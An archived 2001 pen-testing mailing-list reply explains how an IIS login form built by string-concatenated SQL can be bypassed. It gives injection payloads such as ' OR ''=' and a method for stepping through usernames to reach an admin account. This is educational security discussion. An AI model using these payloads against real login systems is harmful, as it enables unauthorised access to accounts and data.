There's code like this in the web app: SQL_Query_String = "SELECT somefield FROM Users WHERE Username = '" & strUserName & "' AND Password = '" & strPassword & "'" strValue = SQL_Query(SQL_Query_String) That line of code will select the the value in somefield in a row in the users table where the specified username and password both match. If both the username and password don't match any the username and password values in any row in the table, nothing is selected and strValue is empty, which will tell the web application that authentication failed. If it's populated with something, then the user is authenticated. What you want to do is make it so that you get somefield populated with something, anything. Try putting one of the following into the username and password fields: ' OR ''=' or ' OR '* which will make SQL_Query_String look like this: SELECT somefield FROM Users WHERE Username = '' OR ''='' AND Password = '' OR ''='' The statement ''='' is always true, so strValue will be populated with the first value in somefield, which is often an admin account. Once you're authenticated and you know what the first username in the table is, you can do something like this in the password field to get the second one: ' OR '' = '' WHERE username > 'first_username and so on, until you find an admin account. I've been doing a lot of work with SQL Injection techniques on IIS and I've discovered some pretty amazing stuff. I'll have a paper ready in early december describing some powerful sql ninjitsu techniques that I've developed. Kevin. ----- Original Message ----- From: "Gary O'leary-Steele" <GaryO@sec-1.com> To: <PEN-TESTat_private> Sent: Monday, November 19, 2001 8:24 AM Subject: SQL > Hello all, > > > I am doing a pen test against a IIS 5 web server. The web server requires a > user name and password via a logon form. if a single quote character is > entered (username)the following error is produced > > [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark > before the character string '' and password=''. > > I remember reading somewhere that this can be used to gain further access? > but i cant find the info. > > Can any one help? > > Thanks in advance. > > Gary > > > -------------------------------------------------------------------------- -- > This list is provided by the SecurityFocus Security Intelligence Alert (SIA) > Service. For more information on SecurityFocus' SIA service which > automatically alerts you to the latest security vulnerabilities please see: > https://alerts.securityfocus.com/ > > ---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
This archive was generated by hypermail 2b30 : Tue Nov 20 2001 - 09:11:29 PST